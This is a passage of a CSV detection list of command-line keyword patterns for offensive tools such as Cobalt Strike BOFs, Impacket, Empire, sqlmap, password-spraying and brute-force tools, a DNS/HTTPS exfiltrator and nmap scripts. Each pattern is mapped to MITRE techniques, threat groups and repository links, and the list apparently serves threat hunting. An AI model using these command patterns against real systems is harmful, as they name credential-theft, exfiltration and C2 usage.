- T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"* sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-ios-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-netstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-sysdescr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Source c:\windows\*.exe -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z"
+"* -Source c:\windows\system32\*.dll -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z"
+"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z"
+"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z"
+"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z"
+"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z"
+"* spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"* spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"* -spn cifs* -session * -clsid * -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* SpoolFool *.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* spoolsploit *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z"
+"* spray -ep ex-plan.s365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
+"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"* ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssh-hostkey.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssh-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z"
+"* ssh-publickey-acceptance.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ssh-run.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
